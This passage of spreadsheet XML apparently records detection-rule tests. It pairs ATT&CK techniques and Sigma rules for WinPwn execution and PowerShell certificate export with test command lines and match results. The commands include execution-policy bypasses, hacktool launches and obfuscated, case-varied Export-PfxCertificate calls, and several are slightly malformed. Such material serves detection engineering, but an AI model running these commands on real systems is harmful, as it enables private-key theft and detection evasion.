        <v>1</v>
      </c>
      <c r="I3388" s="44" t="n"/>
      <c r="J3388" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3388" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3389" ht="15.75" customHeight="1" s="42">
      <c r="A3389" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3389" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3389" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3389" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3389" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3389" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3390" ht="15.75" customHeight="1" s="42">
      <c r="A3390" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3390" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3390" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3390" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3390" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3390" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3390" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3391" ht="15.75" customHeight="1" s="42">
      <c r="A3391" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3391" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3391" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3391" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3391" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3391" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3392" ht="15.75" customHeight="1" s="42">
      <c r="A3392" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3392" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3392" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3392" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3392" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3392" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3393" ht="15.75" customHeight="1" s="42">
      <c r="A3393" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3393" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3393" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3393" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3393" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3393" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3394" ht="15.75" customHeight="1" s="42">
      <c r="A3394" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3394" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3394" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3394" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F3394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3394" s="44" t="n"/>
      <c r="J3394" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3394" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3395" ht="15.75" customHeight="1" s="42">
      <c r="A3395" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3395" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3395" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3395" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F3395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3395" s="44" t="n"/>
      <c r="J3395" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3395" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3396" ht="15.75" customHeight="1" s="42">
      <c r="A3396" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3396" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3396" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3396" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3396" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3396" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3396" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3396" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3396" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3397" ht="15.75" customHeight="1" s="42">
      <c r="A3397" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3397" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3397" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3397" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3397" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3397" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3397" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3397" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3398" ht="15.75" customHeight="1" s="42">
      <c r="A3398" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3398" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3398" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3398" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3398" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3398" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3398" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3398" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3398" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3398" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3399" ht="15.75" customHeight="1" s="42">
      <c r="A3399" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3399" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3399" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3399" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3399" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3399" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3399" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3399" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3399" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3399" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3400" ht="15.75" customHeight="1" s="42">
      <c r="A3400" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B3400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3400" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3400" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3400" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3400" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3400" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3400" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3400" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3400" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3401" ht="15.75" customHeight="1" s="42">
      <c r="A3401" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3401" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3401" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3401" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3401" s="43" t="n"/>
      <c r="J3401" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3401" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3402" ht="15.75" customHeight="1" s="42">
      <c r="A3402" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3402" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3402" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3402" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3402" s="43" t="n"/>
      <c r="J3402" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3402" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3403" ht="15.75" customHeight="1" s="42">
      <c r="A3403" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3403" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3403" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3403" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3403" s="43" t="n"/>
      <c r="J3403" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3403" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3404" ht="15.75" customHeight="1" s="42">
      <c r="A3404" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3404" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3404" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3404" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3404" s="44" t="n"/>
      <c r="J3404" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3404" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3405" ht="15.75" customHeight="1" s="42">
      <c r="A3405" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3405" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3405" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3405" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3405" s="43" t="n"/>
      <c r="J3405" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3405" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3406" ht="15.75" customHeight="1" s="42">
      <c r="A3406" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3406" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3406" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3406" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3406" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3406" s="43" t="n"/>
      <c r="J3406" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3406" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3407" ht="15.75" customHeight="1" s="42">
      <c r="A3407" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3407" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3407" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3407" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMand "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3407" s="43" t="n"/>
      <c r="J3407" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3407" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3408" ht="15.75" customHeight="1" s="42">
      <c r="A3408" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3408" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3408" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3408" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3408" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3408" s="43" t="n"/>
      <c r="J3408" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3408" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3409" ht="15.75" customHeight="1" s="42">
      <c r="A3409" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3409" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3409" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3409" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaND "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3409" s="43" t="n"/>
      <c r="J3409" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3409" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3410" ht="15.75" customHeight="1" s="42">
      <c r="A3410" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3410" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3410" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3410" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3410" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F3410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3410" s="43" t="n"/>
      <c r="J3410" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3410" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3411" ht="15.75" customHeight="1" s="42">
      <c r="A3411" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3411" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3411" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3411" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3411" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F3411" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3411" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3411" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J3411" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3411" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3412" ht="15.75" customHeight="1" s="42">
      <c r="A3412" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3412" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3412" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3412" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3412" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F3412" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3412" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3412" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J3412" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3412" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3413" ht="15.75" customHeight="1" s="42">
      <c r="A3413" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B3413" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C3413" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D3413" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E3413" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F3413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3413" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3413" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3413" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J3413" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3413" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3414" ht="15.75" customHeight="1" s="42">
      <c r="A3414" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
